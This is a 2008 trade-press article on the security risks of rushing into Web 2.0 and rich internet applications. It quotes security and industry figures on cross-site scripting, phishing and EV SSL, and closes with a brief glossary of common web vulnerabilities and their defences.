Web 2.0 promises a banquet of tasty features, rich experience and sizzling socialising. But will the dash to gorge bring its own problems?
Given the hyperbole surrounding rich internet applications (RIA), Web 2.0 and social networking, you would not be surprised to hear a Microsoft program manager, Joe Stagner, say, "It is a perfect storm for RIAs right now. Companies developing web applications cannot wait any longer to solidify their RIA strategy."
The implication is clear: if your company delays building rich, responsive, socially-networked web applications - with tools such as Ajax, Flex, Appcelerator and Silverlight - you could be left behind by the competition. Your competitors are forging ahead, you must rush to adopt.
Yet according to Ken Munro, managing director at penetration testing specialist Secure Test, rushing into Web 2.0 is the last thing you should be doing, because the consequences of getting your security wrong are severe.
"You can get a vulnerability in a web application that is exploited one day and infects a million users the next. The potential impact is so big, it is enough to take a brand down," he says.
And his remarks are not fantasy. Two years ago the Samy worm exponentially infected over a million users of social networking site Myspace, within 24 hours. Samy smashed a previous propagation record, for an internet worm, set by Code Red, July 2001, which managed only a paltry 350,000 victims after four days. Luckily for Myspace, Samy also gained some "cool" status for its benign effect: the payload amounted only to making the victim a "friend" of the worm's writer.
Jonathan Armstrong, technology law partner at Eversheds, agrees with Munro's pessimism, particularly with regard to social networking sites. He says that reputation risk is much more important to companies than risk from litigation or legislation. "If you get it wrong, then you are dead. A lot of the business models are just chasing visitor numbers, but if they compromise the visitor, then they are worthless. The community ethos is the value behind it, and if you destroy the ethos, then you destroy the brand."
The desire for visitors causes experimentation with new technologies, but the security issues these technologies bring are not always immediately apparent. And because RIA necessarily increases the amount of computer code downloaded to the browser, in order to produce the desired richness, there is more for a hacker to examine and exploit. Hackers read the source code, or perhaps re-engineer it, and look for areas of weakness.
Ajax, a development scripting language based on Java script, is singled out by Munro as potentially dangerous because it operates asynchronously, in the background, without the user's explicit knowledge. "A lot of the processing is happening in the Ajax engine. It is hiding some of the actual processing from you. Stuff is going on in the background of your browser, being processed in real time, that you are not directly controlling," he says.
Asynchronous code can help avoid the clunky reloading of web pages. For example, instead of an entire page being refreshed when the user completes typing into a search box, smaller incremental data exchanges can occur, continually updating the page while the user types.
This innovation improves a surfing experience, but it also increases vulnerability and the amount a hacker can achieve if a system is compromised.
Munro believes Cross Site Scripting (XSS) is the largest threat to Web 2.0. Malicious XSS subverts a user's browser to run instructions from somewhere other than the site visited, and although this attack has been known of for many years, the introduction of RIA and asynchronous techniques increase its potency. All a victim needs to do is click one fraudulent link and code can be running in the background, logging keystrokes, stealing cookies or sending spam.
Andrew Kellet, security analyst at Butler Group, sees all this as just a tired re-running of technological roll-outs without proper thought. "The business IT industry is going through another one of those head scratching exercises. When new approaches to delivery and usage have come along, security has tended to lag behind. There is no excuse for not putting security facilities into products, and that goes right back to the build and development."
To make matters worse, Kellet says many users of Web 2.0 tend to be a self-selecting group of high-income, technology-rich twenty-somethings. Ideal targets for fraudsters. "They are probably employed in an industry that pays well, will have credit cards and online account facilities," he says.
Rich pickings attract attention, but many companies are fighting back and stipulating the security measures developers must build. "It depends on the requirements for the particular project," says Mike Jones, an independent RIA developer. "If you are dealing with transactional information, especially of a commerce nature, then you are going to use all of the tools and methods that are inbuilt into the browser."
However, he says, "A client may say, 'we want it to be secure', but that is just a buzzword they have heard because security is very big at the moment. They may not have a concept of what they are asking for."
It must not be forgotten that security issues are often deeply technical and there can be a mismatch between business knowledge and developer experience.
This is one reason why Badoo, a social networking and picture-sharing website boasting nearly 13 million users, tries to employ only top development staff. It is a critical policy for the company says program manager Mike Greer. "Our computer engineers have at least ten years experience - each of them. We hire only the people that have shown themselves to be pretty amazing in their field," he says.
But Badoo does not rely on hope that its developers will write secure code. Given the complex mixture of open source products including MySQL, PHP, Nginx, plus a lot of our own in-house developed C++ and C software, it was essential the company established safe-site practices and policies. These included filtering all user input for active HTML or script content, forbidding users from adding off-site links and installing smart captchas that brake overly active users who might turn out to be bots.
"We have also introduced, and believe it should become an industry standard, extended validation SSL certificates (EVSSL). This will work with the user's browser to allow them to know when they are on a validated site, by showing them a green URL bar," says Greer.
The EVSSL initiative has been driven by Verisign since a 2006 Harvard/UC Berkley study showed that 90% of consumers could not tell the difference between a website and its fraudulent counterpart.
Such knowledge is essential to prevent phishing, which remains a constant threat. But Web 2.0 with asynchronous coding can make phishing much harder to detect. "By just browsing to a website you have got something running. We started shouting warnings about phishing and cross site scripting being used together, and, lo and behold, a bank was phished with an XSS attack," said Munro.
Munro is referring to January's Banca Fideuram attack, which was the first XSS-phishing attack to run on a bank's own website, using a genuine SSL certificate, making it very difficult for the user to know the login screen was fraudulent.
"Sadly, I think EVSSL is an irrelevance, and will probably just accelerate the use of XSS in phishing attacks, as conventional phishing attacks become less effective as a result of EVSSL," says Munro.
This is no reason, of course, not to make it difficult for standard, non-XSS, phishers. "Research indicates that EV is definitely effective as a deterrent against phishing, and companies have every reason to take advantage of EV to combat phishing," says Tim Callan, vice-president of product marketing at Verisign.
"Companies can also take steps to protect their sites against XSS, and they should go ahead and do that as well," says Callan.
XSS cannot work without a vulnerability in the target site's coding, which is why it is so important to consider security from the outset of a website project, to ensure that security is part of the build methodology, says Butler Group's Kellet.
And software developer, Jones, agrees saying, "Although it is really cool to build an application and get it out there, when you start having real people using your system you have to be very conscious you are dealing with their data. Do not build a prototype and then launch it. Build a prototype, do the test, learn from what you have developed, and take that learning and build the actual system."
Jones says he has been frustrated when he has seen clients not taking security seriously, rushing into cool developments beguiled by the technology, often due to time and budget constraints. "A lot of them were start-ups rather than established businesses, but if development's not done with due diligence, you can end up in a pickle," he says.
Web 2.0 and rich internet vulnerabilities
Cross-site scripting (XSS): The user's browser is subverted to run instructions from somewhere other than the site visited. Sessions may be stolen, cookies read or keystrokes logged. Defence includes input validation and input filtering.
Client side validation: To save network time users' input can be checked by the browser. Hackers can inspect the validation and either circumvent or change the checks. Validation should be performed server-side, or checked on the server.
Thick client binary manipulation: Applications running partially on the client can be reengineered back to source code, changed then recompiled. Defence includes server-side programming and code obfuscation.
Prototype theft: Object orientated programming allows code and data to be overridden. Any XSS vulnerability may enable hackers to "wrap" genuine code with a malicious program.
SQL injection: Database queries formulated from unchecked user input can be vulnerable to the insertion of additional SQL syntax, revealing data structure and security measures.
This was first published in February 2008